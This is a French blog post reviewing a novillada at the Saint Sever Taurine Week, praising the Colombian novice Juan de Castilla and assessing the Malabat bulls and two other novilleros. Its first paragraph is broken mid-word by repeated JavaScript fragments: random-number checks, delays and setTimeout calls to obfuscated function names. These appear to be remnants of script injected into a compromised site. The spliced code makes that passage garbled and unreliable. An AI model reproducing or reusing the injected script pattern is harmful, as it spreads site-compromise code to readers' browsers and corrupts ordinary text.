L’ESPERANCE VIENT D’AMERIQUE

Novillada de clôture de la saison française qui fêtait aussi les trente ans de cette remarquable Semaine Taurine de Saint Sever et pour couronner le tout c’était la présentation en piquée de l’élevage du sud ouest de Malabat. Mais a posteriori ce qui aura marqué en ce jour l’aficion c’est les deux prestations d’un jeune colombien inconnu du grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and public et qui répond au nom de Juan de Castilla.

Très courageux face à son premier, il n’a pas hésité à s’imposer avec la muleta de la main gauche alors que cela semblait impossible mais c’est au dernier qu’il a réellement convaincu. Avec son toreo de cape coloré et vibrant, son placement à la muleta sur des terrains à risque, des séries enchaînées sur un périmètre restreint et une superbe mise à mort. C’est sa cinquième novillada piquée.

Concernant les novillos leur présentation et leur comportement ont été très variables. Manquant de trapio et invalides les deux premiers, les restants furent mieux présentés, surtout cinquième et sixième qui se sont montrés les plus braves, avec des charges répétées et nobles. Une novillada, malgré les premiers novillos, de bonne augure pour ce petit élevage.

Quant aux novilleros, Mario Dieguez a montré quelques gestes mais cela fait trop longtemps qu’il vivote dans l’escalafon inférieur et son avenir paraît incertain et en ce qui concerne Miguel Angel Silva il est passé à côté du bon cinquième et n’a pas fait grosse impression.

 

galerie de photos BRUNO LASNIER

[simpleviewer gallery_id="87"]

Les commentaires sont fermés.